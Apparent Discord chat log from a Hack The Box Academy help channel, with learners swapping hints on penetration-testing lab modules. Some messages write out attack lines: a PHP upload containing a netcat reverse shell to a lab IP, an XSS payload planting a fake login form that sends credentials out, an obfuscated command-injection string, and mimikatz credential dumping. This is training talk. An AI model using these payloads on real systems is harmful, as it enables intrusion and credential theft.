TL;DR: I want to pipe my host through an RDP I have access to, to access its subnet
Under Linux Fundamental -> task scheduling -> Questions
Answer the question(s) below to complete this Section and earn cubes!
What is the type of the service of the "syslog.service"? , I've tried using systemctl command to list all services and also trying out every 'type' possible for the answer but it shows ERROR!
Anyone else having trouble connecting to the RDP on the Windows Privilege Escalation Module under the SeImpersonate and SeAssignPrimaryToken section?
https://wiki.archlinux.org/title/systemd, there is an option to get the "type" man page can help
did you single quote the password?
Im trying to upload a ss it wont let me
dm you
read #welcome and #rules after that use /verify at #bot-commands to verify your account to send your screenshot here
cheers, ill have that done.
why RDP? there is a chance the user simply isn't allowed to RDP in as that's not what was shown in the section
yeah told him the same
haha yeah my bad, I misread the question. Ive been doing windows boxes back to back connecting via rdp and this one threw me offguard wondering why my RDP is failing lol, I clearly need some sleep lmaoo. I was able to solve the section though thanks to autom4il for the shout.
np, everyone makes mistakes
yeah I've been there too. happens
why are you searching for all services? try searching specifically for the service the question asks for
Im actually having the same issue on the windows privesc module but on the windows server section, RDP is giving me some TLS error
Probably some issue with the infra?
did that using grep in above ss
they had problems yesterday around the same time, but today everything is running smoothly for me
can i DM?
[08:47:26:370] [99488:99489] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
I think theres some issue with the machines on the windows privesc module from my understanding
have you tried the two classics? resetting the machine and switching VPN
Good idea, let me try another vpn profile
Nah, still some connection issue, tried UDP & TCP. I've reset the machine already like 5 times
try contacting support then, they can probably help you
Will do, thanks!
did you try with the option /sec:tls ?
Just tried, still the same error, no idea why, I've asked support now
You still having issues?
I seem to be able to connect via RDP on most boxes, but its not the smoothest experience on these boxes. I face lag or the session automatically closes sometimes haha
Yeah same, its a bit laggy this module. Some sections I just spawned a reverse shell since its not so slow as RDP
Yup woulda been a lot easier to just use CLI instead ngl, unless some sections purely need use of GUI to escalate.
when migrating to different framework of javascript do you guys start from the scratch and copy the old files back to the new environment?
AD Enumeration & Attacks - Skills Assessment Part II, anyone able to give me a hint on Q6
Hey! Having some trouble with "advanced command obfuscation" in the command injection module. I'm base64 encoding "find /usr/share/ | grep root | grep mysql | tail -n 1". Getting the ping output but nothing else. When I only encode "find /usr/share/ | grep root | grep mysql |" im getting the expected output. Tried all variants i can think of but not getting the filtered output. This example prints everthing within usr/share: ip=127.0.0.1127.0.0.1%0a$(base64${IFS}-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWw=)%09%<<<%09%24%28r%09"[A-Z]"%09"[a-z]"<<<"tAiL%09%2Dn${IFS}1"%29t any tips?
thanks, saved me a lot of time
Hello everyone, is it possible to use responder over tunneling ?
Or do i need to be in the same network ?
I'd assume you need to be on same network. if you can, simply transfer it over (or use Inveigh if it's windows)
hello, can someone help me with the evaluation of sqlmap, I have the flag but it doesn't work
maybe read the csv file ?
the problem is a special character
Hi guys
I have a Q regarding module "Active Directory Enumeration & Attacks": "Living Off the Land"
I found all the required in the Qs, but in the last Q they want to find a "disabled account with administrative privileges"
how do I know that those accounts are with administrative privileges??
DCs usually have a bunch of shares with tons of files. take a look around
hello guys, I'm stuck on the Exploiting Web Vulnerabilities in Thick-Client Applications part of Attacking Common Applications. I did exactly what the module says: changed host file, changed beans.xml to port 1337, deleted all hashes in MANIFEST.MF (there's a newline there), deleted 1.RSA and 1.SF, and updated the binary. However, when I run it I still get "connection error". I don't understand what I'm doing wrong here.
hosts file, beans.xml, directory, and MANIFEST.
back when I did it, fiddling with the host file would only break it. simply not touching it would do the trick
oh shoot, I don't remember the original IP. have to reset now
do i care?
you don't have to man.
damn dude chill
I'm currently doing the Attacking Enterprise networks, and have noticed that of many domain users I have, only one can connect to the specific machine via WinRM protocol (using evil-winrm) - all others return authorization error. I'm trying to understand what determines which users can connect via that protocol? Is there a way to enumerate users that can do that using the Bloodhound?
This is not necessarily a module question, but a more 'broader' one
just kidding my man
Yes, they taught a custom cipher query for BloodHound which checks for users with PSRemoting privileges. those will be able to use WinRM
Gotcha! I vaguely remember it, but I think I remember where it is
yeah not sure where exactly it was but definitely AD module
Yup, will look for it in a bit ^^
I already have it
if anyone online right now and is willing to help, it'll be awesome
malware analysis module 4th question in skill assessment
Hm, I found it, but it returns 0 results in the Attacking Enterprise Networks module
ugh okay. well then idk what's going on there
AD Enumeration & Attacks - Skills Assessment Part II
I have a shell on SQL01 but I can't work out what to do next, I have tried privesc abusing privileges to no success. any hints?
the idea is correct. I believe you have a privilege in sight that you can exploit?
yeah I am trying to abuse it to get system but it doesnt want to work
well there is a lazy way to exploit it if you wanna know
lol i think the netcat binary got corrupted when i transferred it
re-transferred across and it works
ugh yeah, happens from time to time. always good to compare checksums I guess, even though it's tedious
yep,part of the fun
for sure
halo, i'm on the broken auth skill assessment last step, already changed the role in the cookie, the profile text is changed but didn't get any flag
not sure if you can use Bloodhound but you can definitely use crackmapexec
shoot me a dm if you still need help with this
Mind giving a hint on what exactly from CME can be used for this?
give me a sec, i will look up some stuff. if i can't find anything i'll shoot you a dm on how to do it, but it's going to be better if you have a blog or an article to go off of
only users that have the required permissions will be able to use winrm, generally that's members of the remote management users group
hint just look for disabled account
quick search for that gives me 2 modules, Injection Attacks and Server-side Attacks. haven't done Injection Attacks and i'm not 100% recommending Server-side Attacks because the module is kinda old
I see.. and those are not visible via bloodhound as they're not domain groups?
it can be a domain group I think, I just think bloodhound doesn't show that, but it does show stuff like psremoting and I believe also RDP
this is a bit basic but basically this should work https://wiki.porchetta.industries/winrm-protocol/password-spraying
also GPT said otherwise https://chat.openai.com/share/483c856c-f97d-4f17-a33f-7daf57628947
don't know if it is just me but the RDP thing works like 20% of the time for me, but mostly false negatives, so a user would have RDP and bloodhound will not show it
yeah, the stable or better version got yeeted to enterprise
gotta love when that happens
So essentially, it's good to attempt evil-winrm with every single user on every single host that hasn't been owned until I get a hit?
if you are stuck, yes
there isn't always going to be a clear path to pwning AD. if you've run out of things to try on all hosts that you pwned and have some creds, the next best thing is to do some spraying
Yeah, getting to know AD is pretty tough for me, as I come from a web development career and have only been working with Linux for my lifetime, to the point where I'm not strictly comfortable with Windows workstations, not to mention Windows Servers. But oh well, I've recently decided to explore AD as well, which is why I went the CPTS path
Still getting familiar with stuff, trying not to blindly follow it without proper understanding
Hey, would just two days a week be enough to complete CompTIA Security+??
nope
at least 3-4, you gotta understand concepts and cyber security logic, you may forget stuff
unless you have notes you are reviewing everyday
depend on where you at in cyber security but generally nope
Okay thanx
I am working on Windows Privilege Escalation: Pillaging. I cannot figure out the last question, "Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer". I own the hash but it does not accept it as an answer
log rotate section is
no, that's somewhere in my future plans though
Hope someone here can give you some feedback on that
I don't think it is worth 1000 cubes
Just out of curiousity...how many cubes do you think its worth?
I would say tier 2-3
but I don't know how they decide the tier
Am talking having done 55 modules
a module's worth is always going to depend on how much you already know about the module
if i know a good bit of AD, same as shockp, hell nah the powerview module isn't worth 1000 cubes, but if i'm new to AD and want to learn how this tool works first hand then this could be worth it, but it all depends on what you know
unlike the powerview tool, which is kinda old and, even though it's an enumeration tool, you have to kinda know what you are looking for when using this tool, bloodhound has a lot of online public resources. here is one to get you started https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/bloodhound
it's still good to know both. Bloodhound isn't perfect always in its collecting
oh yea i know that, specifically this has kicked me in the balls before when i was doing offshore
pls help
somehow it missed some stuff and i ended up stuck for almost a week, but i mentioned that because the powerview module definitely isn't worth 1000 cubes
unfortunately not that long
oh that's just HTB being evil one of them has the wrong hash and you probably got that one
dump the rest and you will find the right hash
can i dm you
sure
also if you look at the last of the section for this module you can probably google how to do each of them
1000 cubes for a tool that's blocked in most environments
Yes
If evasion is your goal, powershell isn't the ideal way to go about it
It's just heavily monitored and/or blocked because of how easy/powerful it is to leverage when it's not being watched
Powershell isn't the issue it's just blocking known tools without attempting obfuscation
like you can enumerate AD by just importing the .dll for AD module if the box you compromised cannot install rsat (admin privs needed)
powershell necessary evil otherwise IT can't do their job
I just assume obfuscation is part of the process in modern environments
I wouldn't say the tool is blocked myself, but now we're just talking semantics
just depends on the environment you're in
abandon powershell, embrace LDAP queries
True
I love how you came in here to specifically tell me something I didn't want to hear
ldap queries make me wanna commit rm -rf
even though it wouldn't be useful cause ldapshell is already a thing, I do at some point want to make a utility for converting ldap extra attributes security descriptors into human readable permissions
I am on the Session Hijacking module where we are to steal the admin cookie via one of the fields vulnerable to XSS on the registration page. . I am receiving the cookie, but the credential is coming back invalid. I have re-tried it 3 times and keep getting the same cookie.
nm, i think I know what I did wrong here
confirmed, completed
discovering your own solution three seconds after asking someone else a question about it is simultaneously the worst and best
yea, I misread something, and realized what I did wrong lol...
I'm on the file upload skills assessment. I've figured out how to read the source code, I know the naming scheme, kinda, and I know the directory the feedbacks are being uploaded to. If I try to visit the upload directory I get a 404. Can anyone help me understand what I'm missing? I was thinking I'd be able to upload a php shell into the feedback comment section and then navigate to it in the url and be set to cat the flag, but I'm not so sure now.
I've been contemplating the "Active Directory LDAP" module. Would you say it's worth it?
Haven't done it
I've been told that my basic understanding of ldap already eclipses what that module teaches
Active directory enumeration & attacks has a little bit of LDAP iirc, it wasn't alot though
read documentation for ldapsearch and ldapmodify
is pwnbox running slow for anyone else today
First thing, you should bypass to get a shell
but here you're getting a 404, so forget the bypass, your path to the uploaded file isn't right
Well, I can't get to the parent directory that the files are held in by the url. I would like some advice on understanding the naming scheme code, I may be able to call the file if I can get that right, shouldn't I?
Everything you need is in the file you found initially, go through it again i'm sure you will figure it out
Dude, I've been on it for a week and a half, I'll look again tomorrow morning, thanks
If you couldn't figure it out just dm me
Thanks
how do i get into a acc with a token?
I took the boot camp a couple months ago. Hoping to get the cert test done soon, but having issues with the voucher. Anyway, with that said, the whole boot camp was just watching Professor Messer videos. And a lot of it is common sense, dependent on your computer knowledge and security knowledge.
is that a question or a statement?
i'm doing HTB attacking common service hard lab
i'm on question Once logged in, what other user can we compromise to gain admin privileges?
i rdp using f**** creds
went to the users section and in cmd line and none of them are the answer in that directory
any tips for me? greatly appreciated
How can you check other users ?
once i'm in f**** account i just cd to users
you use the lessons taught in the module
is this command correct
sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30
trying to establish a connection within my rdp env. this example was provided by HTB
Can anyone just help me with this: Perform a Nmap scan of the target. What is the version of the service from the Nmap scan running on port 8080? . I did nmap with -A -sC and scripts such as banner, http-title-http-enum and burpsuite. I was able to get anything. The hint says a simple version scan but even this is not giving me any feedback
try --disable-arp-ping -Pn and -n
maybe -p- -sV or -p- -sV -Pn -n --disable-arp-ping --packet-trace? Doing a similar type question on another module dont recall needing an aggressive scan for it.
this should reveal the banner ncat -nv <ip> <port>
Actually, this ^. What @lusty thicket said.
i hate thick-client vulns lol
Is fundamental good
if the bug bounty path is all different web application hacking techniques, how is it cumulative?
or is it not cumulative?
I'm assuming its different from CPTS that way?
Advanced command injections
right but how do I retain all of the information from the CBBH path as I learn it?
I want to be able to get certification
like CBBH cert
and I'm scared of forgetting stuff
before its time for me to take test
you take notes
ok but even taking notes which I'm doing
wouldn't it be difficult to retain skills as you progress in a pathway if you aren't constantly practicing everything you have learned?
are there any main platform learning paths that would reinforce everything from CBBH pathway?
like OWASP to 10 pathway or other learning paths dedicated to web?
Can someone help me out with Assessment 2 Question 8 in the "Active Directory Enumeration & Attacks" Module?
can anyone give me a hand on the final skills assessment for "Web service and API attacks"?
I have a working command, have the password, cant reverse the md5 hash.
you practice enough until you have a methodology down, the notes make it so that you don't have to memorize specific payloads you like using, or very niche exploitation steps you may have only seen once in the past
Enumerate, examine, exploit repeat
You get the flag in plain text and not as md5 hash.
i'm stuck in this exercise:
What is the IP address of the eth0 interface under the ServerStatus -> Ipconfig tab in the fatty-client application?
someone could help me?
I've got what I think is the hash and I'm using the same three methods of connection to no avail
who's hash do you have?
Administrator. but its from mimikatz# lsadump::lsa /inject on the SQL01 host
do you think there might be more hash laying around?
yes but not exactly sure how to look at the cached ones. going to reread through the module and see where dumps are happening for accounts that arent local to that machine
I've attempted looking for users, groups, hashes coming from MS01 to SQL01 and not finding anything
use that advice MarcieLee had above on SQL01
?? the enumerate examine repeat?
are you saying to use evil-winrm from SQL01 and not the parrot box?
or enumerate for more SQL dbs???
I am saying to thoroughly check out SQL01 try some of the things you have done already...
i'll see what i can see
well I don't want to just give it away... you're right there, keep looking, so close
its ALWAYS staring me dead in the eyes
Don't I know that!
You'll get it, I know the feeling....
klist
Hello everyone! Hope y'all are having a great day!
I'm going through the HTB academy modules and I'm currently on the Dynamic port forwarding/tunneling module. I'm currently having an issue using proxychains on kali linux running on WSL2.
I have posted a detailed question here: https://stackoverflow.com/questions/77005573/im-having-problems-with-proxychains-on-wsl2
Any help would be greatly appreciated!
Cheers!
Hello everyone, this is my first time posting on this server, but I encountered a problem in the "Using Web Proxies" module, at the "Burp Intruder" exercise. I managed to find the "index.html" file (using gobuster because it was faster than Intruder), but the file has no flag in it, and I was not able to find another file. Can you please tell me if I did something wrong? Thank you very much!
hi my first time posting on this server, i'm tom and did you use the common.txt wordlist?
in my defense, GPT wrote that dad joke
Hello MRtom, I used the common.txt file with gobuster
from SecLists?
no, from /usr/share/wordlists/dirb , but I will try using that one now
yea that's the issue
This is the result of the scan using the list from SecLists, I get the same index.html file, but it has nothing on it
Am I doing something wrong? or is it a bug?
and you did use -x html right?
No, I did not
but now I found the flag
thanks for the assistance!
I am in Password Attacks Lab: Hard
Can anybody help me with commands to download the file 'Logins.kdbx' file to pwn box?
I keep getting errors..!
you could use base64
a bunch of download methods indeed do not work. however, using evil-winrm will work
yeah that should work too
Ok let me try this one
Can I DM you?
sure
guys is OSCP enough to get a job?
This is a better forum to discuss this: https://discord.com/channels/473760315293696010/482659243456200705
I don't have access to it
CROSS-SITE SCRIPTING (XSS)
Phishing
My command is the exact same as the one taught in the section:
document.write('<h3>Please login to continue</h3><form action=http://10.10.16.51><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();
But for some reason I get this output on the page:
NVM I guess it doesn't matter, the automated login still occurred even though the page didn't hide the image URL element
if you still want to remove it check this #modules message
also you can change the broken icon into something like the bloodhound dog icon for tool but that's just for fun
Thanks Tom
Hey Guys!
I've got this problem that I just can't figure out...
I'm in the Nibbles blog post at privilege escalation and I'm stuck at LinEnum.
Every time, in any way that I try, I get a 404 File Not Found. I've tried it the normal way and another way a blog post told me, going to /dev/shm. But both give me the same error.
Anyone who can tell me what I'm missing?
are you trying to download a script to the machine?
plut0x00 means: have you downloaded LinEnum to your machine? If yes, are you running your Python HTTP server in the same directory as the script?
I'm starting to believe that I truly don't understand the assignment
It is at privilege escalation. It says that if I wget this file then I'll get my root access to get the flag.
The instruction is this: Back on the target type wget http://<your ip>:8080/LinEnum.sh to download the script. If successful, we will see a 200 success response on our Python HTTP server. Once the script is pulled over, type chmod +x LinEnum.sh to make the script executable and then type ./LinEnum.sh to run it. We see a ton of interesting output but what immediately catches the eye are sudo privileges.
But I'm getting a 404 file not found
What the section shows is that you can host that file using a Python HTTP server on your machine and download it on the target machine from yours
but the issue here is you need to download the script onto your machine first
yes indeed
so the question still is: are you running your python http server in the same directory as the script?
Do you mean the php exploit script?
nope the LinEnum script
As far as I understood it, I had to run the sudo python script from my HTB virtual machine. Then I had to run the wget command from the target server. Am I wrong there?
That's also what kinda made sense to my basic knowledge
the Python HTTP server will host every file in the directory that it's run in, so you need to have the LinEnum script in that same directory
So what you are saying is that I have to look up where the file is on the target directory and run the wget from there?
:))
nope, but if @lusty thicket is here he can continue helping you
I'm so utterly confused, but thank you for trying, I really appreciate it
you have to host the python http server in the same directory where the linux enumeration script is
before you access it from the nibbles machine
Ok, I think I know what you mean (might also be that Dutch is my first language)
don't you remember how the alert script looked? There's a little detail you have forgotten
you have to close the img url tag, then proceed with the script
his problem is the site after the payload doesn't look like the example but everything else is working fine
Someone able to give me a hint for Windows PrivEsc module, section Credential Hunting? I'm stuck on the first question. I found multiple passwords but none of them seem to be correct. I must be missing something
yeah but the script he's injecting is without closing the img url tag
so the xss payload should be like "> or '> and then proceed with the payload
and he should probably try slapping <script> and </script> tags around the payload because the second script which removes the img url form seems to be rendered as plain text
oh no, that part is on purpose
that's what the section shows
it's just that the last document.getElementById('urlform').remove(); bit is supposed to remove some UI stuff but it doesn't work. I found a "fix" for this a while back
I faced that problem too, it worked with script tags
and then commented out the remaining '> with an HTML comment <!--
reading my notes for this part, it seems like I was both drunk and high at the same time, but the hint there is an example about a ||findstr|| command that looks for the word "password" in a ton of file extensions, and the last one has the right pass
oh yea that's what my dump "fix" was about
@lusty thicket sorry to bother you once more. So I've put the sudo python3 server in the Desktop directory, where my PHP script that I uploaded to the server also is.
But now that I typed it out, this might have been a dumb idea?
I'm completely lost to be honest, it still doesn't work...
btw do you have a job in the cybersecurity industry or are you still learning?
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh; python3 -m http.server 8080 — just run this on your machine and run the same wget command on the target machine
ugh yeah found it. there are literally like 10 passwords you can find and you have to guess which one they want -.-
is that the relative path where your linenum.sh script is?
thanks tho
you can do this too
Could anyone help me with the Exploiting Web Vulnerabilities in Thick-Client Applications section of the Attacking Common Applications module?
yeah I can try. feel free to DM me if you wanna keep it out of this chat
I have a question: do y'all take notes from modules? And do you use a specific app to take notes or just paper?
taking notes is very important. I believe the most widespread app used is Obsidian. However there are others in use too, e.g. CherryTree and Notion
Thank you sir, I'll try to take some notes
what helps me keep good notes is one simple question I ask myself: Given the notes I have, would I be able to help someone else debug their problems with this section?
give this a look #resources-tools message
Oooh that's an interesting way to take notes
Thank you
oh nice same
ah this is awesome, I'll definitely check it out later. I'm still using my old trusty VS Code markdown files, which isn't exactly optimal lol
I do step by steps in notepad and save each .txt as the module or section name. Gonna throw it all into OneNote at some point. This will help me go back later to see if there are other ways to find flags, etc.
for the love of god, if you are going to migrate your notes to a different platform do it now before you have too many notes
agreed
I've got 467 txt note files for the academy
I'm going to transfer and re-do all of it to Obsidian in 2077
oh god good luck with that lol
I'm definitely in the hundreds with my markdown files too but I'm pretty sure Obsidian has to have some kind of import functionality. If not, well then I'm f'ed
Thankfully I asked the question, I only did 3 modules
Obsidian is a community tool type of thing so there definitely will be, but the thing is, after you've done your 20th module and look back at your first module's notes they're going to be sh!t, so you have to change them, but if you do then you may as well change the rest, and this is the cycle of writing-good-notes hell
well that's kinda true but by now I've helped so many people and always improved my notes when doing so. They're not perfect, but good enough for the most part
You just copy your markdown files into your Obsidian vault folder and you're good to go
Module: ATTACKING COMMON SERVICES
Section: Attacking DNS
Question: Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
Okay. I actually already have the flag for this question but I need someone to explain to me why subbrute is the only tool that was able to identify the appropriate subdomains. I tried a handful of other tools (DNSEnum, DNSRecon, and a one-liner loop with a DNS subdomain wordlist) but none of them came up with usable results.
For the one-liner, the wordlist DID have the question's correct subdomain name in it. I even went as far as to create a test.txt file containing ONLY the correct subdomain and it still didn't work. It did, however, return a handful of other subdomains for inlanefreight.htb. Trying to figure what the gap here is. Any ideas?
Edit: The one-liner in question: || for sub in $(cat /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.83.105 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done ||
Awesome. Then it looks like I'll be doing that soon
Anyone that can help me with Upload Exploitation in File upload attacks? Should be a pretty straight forward reverse shell, but doesn't work for some reason.
I've tried several reverse shells, most recently the msfvenom and pentestmonkey. Tried several ports and am using tun0 as the ip on the attackbox. Any methodology to know if the problem is the script or the port?
nope, you can't get a shell for any target in that module if I remember correctly
all targets that have a public IP are Docker containers and are intended for you to only access the given port, exploit some stuff and get the flag, not a shell
oh
I would like to clarify that:
No reverse shell, but web shells are entirely possible
oh yeah, I guess something like a PHP bash shell would work, but you already have RCE though
the problem is the reverse shell
Yup, you're right. Thanks a lot:)
awesome
That was a phenomenal module IMHO.
You are phenomenal mr hillman
I'm getting a weird error with the pwnbox vm. Every time I try to open it in a new window/tab, that new window/tab goes blank after a few seconds and I'm no longer able to interact with the pwnbox instance. Not sure how to go about fixing it.
try refresh that page
I've done that. It pops back up with the pwnbox vm visible for a few seconds and then the whole thing blanks again.
Hi All. I have come across something a little strange. I am working through the CBBH Cert > Using Web Proxies > ZAP Fuzzer page. But when I am running through the question I should be getting a 200 response on the skills directory to get the cookie. But instead getting a 301 Moved Permanently response code. Can someone tell me if this is correct??
you need to get a status 200 for the right cookie only, use top-usernames-shortlist.txt as payload
No I need it to be a 200 first to be able to give me a cookie. Visit '/skills/' to get a request with a cookie, then try to use ZAP
Have sorted it
you need to fuzz the cookie with the MD5 hash processor
this was my first ever module. I loved it
hello there, I have 2 questions about command injection module, is there someone who can explain?
I use Cherrytree but obsidian is nice. I just dont want to pay for it.
yo, long time no see. Also, Obsidian is free, but you can pay for the Sync thing if you want
ok, I see, this will be hard.. guys are talkin' about text editors
SQL Injection Fundamentals, last page where you have to try a machine yourself. I didn't have problems, but the hint said something like "check in which directory you have write permission". I found out that the user was able to write in the "dashboard" directory randomly after some tests. Was there a way of finding it out from SQL or is it just common sense? Thank you!
spent nearly an hour stuck on a payload & shells question
turns out i just forgot to set a metasploit option and overlooked it continuously
wouldve been done in 5 minutes otherwise
im gonna jump off a building
I had the same thought 1 week ago
That is good
Crazy stuff happens in Password Attacks module
You need power from whole anime universe to finish that
Good luck Samurai
feel free to ask. I've completed that module and can probably explain
what do you need help with?
hello
anyone know why in the skill assessment 2 for deserialization attacks both these buttons are redirecting to local host: ****
https://academy.hackthebox.com/module/116/section/1169 - when using Responder to get the password of mssqlsvc I get this error from Responder. Anyone know why?
I was able to get the hash using the smbserver method. I've used it before. I want to make sure I have more than one resource for this though.
same error
I checked netstat -tulpn and that port 389 isn't being used
Oh duh, I had to make the connection back to my machine to get the hash lol
nm they both work. Still get that error though
cool story bro
the whole academy is there to teach you
who can teach me?
htb academy
you can use deez
Module: ATTACKING COMMON SERVICES
Section: Attacking Email Services
Question: Access the email account using the user credentials that you discovered and submit the flag in the email as your answer.
I was able to bruteforce the username:password but I'm unable to login using those credentials.
|| When I try to use pop3 or imap, I get the following error (respectively):
telnet 10.129.203.12 110
Trying 10.129.203.12...
Connected to 10.129.203.12.
Escape character is '^]'.
+OK POP3
USER <username>
+OK Send your password
PASS <password>
-ERR Invalid user name or password. Please use full email address as user name. ||
A nudge would be helpful.
Edit: Corrected the Section Name.
what is this
yes
i would never
Most of us have learned from the 2010 Walmart mic YouTube Indians
this is true
what does this even mean?
bro is asking how to hack in the #modules channel of htb lmao
how do u get here and still have that question
Module: Getting Started
I have similar problems as Bricktrooper had #modules message
But the solution from Deleted User
#modules message
didn't help me.
I try to upload the file image.php
<?php system('id'); ?>
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.169 9443 >/tmp/f"); ?>
But the upload does not work. I tried to reset the server. Downloaded a new vpn connection file. But always with the same results.
After the upload of my file, there is a tcp window update, and after that only retransmissions in Wireshark.
Please help me.
@small steppe IIRC, you might find an 'Evolution'ary way and mess with the settings that seem feasible to you get it.
<?php system('id'); ?>
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -lnvp 9443 >/tmp/f"); ?>
try this
instead
thx for the fast reply. i will try it. have to restart the target...
you're welcome
Sorry, this is not the solution for me. The problem is the upload. When i click on save changes, it is loading and loading. But with no result. Any other suggestions?
somebody would like to suggest me one module (tier 0)? i just completed sql injection and that was pretty fun. (i have 40 cubes)
Could it be possible that the upload with my ip address is blocked?
I don't understand
@jocdelade curl the path to see if you get a response.
yes you can do this
When I try to upload the file. The page is loading. And when I try to find the image.php on the path, there is no image. And when I monitor the packet exchange, there are only retransmissions.
Using the Metasploit Framework
I get a 404 file not found response, when I curl the image.php.
try using the pwnbox for that question
Thx good idea i will try this.
I don't have notes on it, so will take me a bit to go through it again. tho if you're still stuck I'll happily do that
I feel like I've done something wrong on Password Attacks -> Password Mutations, hydra has been going for 90 mins and hasn't got the password yet
yeah it should be much quicker than that
Thx a lot. I dont know why this was not working from my vm machine. But with pwnbox it was fast and easy.
ok ty for the tips,
I feel stupid now that I didn't check what other ports were open, the question said SSH so I just went straight to SSH bruteforce, didn't even run nmap
you're welcome bro
really need to get in the habit of running nmap on every IP I see
yeah, I expected it to take a little while but maybe like 10 mins or something, I didn't think they would really want me hammering it for hours (even if a real target may take that long)
I'll try cutting out the short passwords + switching which service I hit
I wouldn't recommend the shorter than 10 rule
Yeah it does, I just don't recommend it :p
alright got the second question done. feel free to share what you did and I can offer guidance
well I did it before so it's not as hard anymore π
reread the second question. you already have everything set up correctly for access, just gotta access the right share
\\DC01.inlanefreight.htb\john
\\DC01.inlanefreight.htb\john
you're right, forgot Discord messes with the backslashes
Ye
also nice to see the same people still hanging around here even after I was gone for like 2 months
dir \\DC01.inlanefreight.htb\john is all you need. no $ though
I'm working on Password Attacks Lab Hard. So far, I have cracked johanna's password and used that to retrieve an encrypted file from the target. I transferred that file back to my attack machine and used keepass2john to crack it. I get a password for (I think) the user David. Now I'm trying to enumerate SMB shares using crackmapexec using David's credentials, but I get an authentication failure.
I can verify if that password is indeed correct if you want. feel free to DM
c$ is a special share that translates to C:
You were looking for a share called "john", not called "john$". that's why it didn't find it
Thanks! I just DMed you.
well, what you did is totally viable. if it works it works
Ohhh I thought you already did that
Easier
You don't have to deal with PTH stuff
Good luck
yeah the skill assessments are doable. if you run into any issues feel free to hit me up, I'll likely be around
Anyone able to point me in the right direction on the last question here: https://academy.hackthebox.com/module/143/section/1421
Feeling like I'm missing something super obvious...
If you have the second to last question done the answer to the last one should be in the same file I believe
Oh god, yeah, I've got it. Thanks so much.
And here I was poring through all the "SQL Admins" group members
no problem
I don't have an access to it
Still working on password attacks lab hard. I was able to get David's password and retrieve a .vhd file. I used John to get the decryption password for this drive. I then used smbserver to transfer the .vhd file over to johanna's Windows machine. If I double click on the virtual drive on the Windows machine, I'm asked for an Administrator password, which I don't have.
you may not mount vhds without administrative privileges I believe. so either you have a windows on hand to mount it on, or you need to mount it on linux. both are possible, the latter is a bit more annoying
Got it. So it sounds like I need to create a Windows VM of my own to transfer the virtual drive to and then mount it over there. Thanks!
that would work, yes
hello
Lmao this is more of a reeee statement. SQLMap course. Ohhhhh no information is of use in information_schema. Then proceeds to make you look for a flag in that DB
could you please help me with Exploiting Web Vulnerabilities in Thick-Client Applications?
I'm not sure why last code is not working
no help needed, got it
You can actually do it in linux as well
For Pass the Ticket (PtT) from Linux, I'm trying to use proxychains and impacket-wmiexec/evil-winrm, but It keeps wanting to route to 4.2.2.2:
$ proxychains impacket-wmiexec dc01 -k
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
|DNS-request| dc01
|S-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<--timeout
I have /etc/hosts updated, /etc/proxychains.conf is updated and chisel is connected between my attack host and MS01.
Any ideas?
got it. Update /etc/proxychains.conf to comment out the following:
proxy_dns
this question was frustrating - Enumerate the "flagDB" database and submit a flag as your answer. https://academy.hackthebox.com/module/116/section/1169
It's easy just worded in a way where you think you need to run crazy complex commands. Here is a hint: look at the cheat sheet and swap out the database name in the mssql command for the flagDB database.
I've seen this question asked multiple times so I'm not the only one not getting this -- In the Meterpreter Tunneling & Port Forwarding module: "Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)" Any help?
Can someone give me an insight into the module INTRODUCTION TO THREAT HUNTING & HUNTING WITH ELASTIC Skill Assessment question 2?
IP/Subnet
Do you mind if I dm you?
sure
Currently doing the Password Attacks module - Protected Files.
Question " Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer."
We aren't provided the password of the Kira user within the material, which is what I take the above as meaning. Do I need to crack the password and, for brevity's sake, do I bruteforce using the provided list for the module with mutations or use rockyou like the example?
Wait found the answer via search. Thanks regardless
please guys, I'm having an issue with the Network Enumeration with Nmap module easy lab question. I scanned my target host and got the operating system as Linux, but when I typed the answer it keeps giving me a wrong answer notification. I'm already stranded at that spot.
I need help, anyone please
Step 1:
Mutate the password from the resource section
Step 2
Credential Hunting in Linux: Kira's password
Step 3
Use ssh2john.py to convert id_rsa to id.hash
[There is a trick here, feel free to dm me]
Step 4
Just brute force id.hash file with the mutated list with john and you will find something
Can you type the command here which you have used?
what flavor of linux is it running?
Look at the scan results carefully
There is something specific to Linux
It wants a more specific answer
Sorry for the late response,
I used
sudo nmap 10.129.2.80 -p 80 -O -D RND:5
nmap -sC -sV -Pn <ip>
Please, I've thought about a lot of answers and tried multiple ones like the service version but to no avail, since I already know the scope. Please can you be more specific with the format of the answer that I should use? I'm crying and I'm running out of data bundles
Its not an issue of format
Okay let me try this out
It wants the operating system. Your answer of Linux isn't wrong, but it's not specific enough.
there are a lot of cases where you can use running services on the machine to fingerprint the operating system
I've not learnt about that yet
i believe it was stated in the module
I am stuck on Password Attacks Lab - Hard
Can anyone tell me where I can find the password to access the david share?
Nothing seems to work...!
Look at the apps on the box, look for an interesting app
see what i found, it's still the same
i think i can't add images here oops
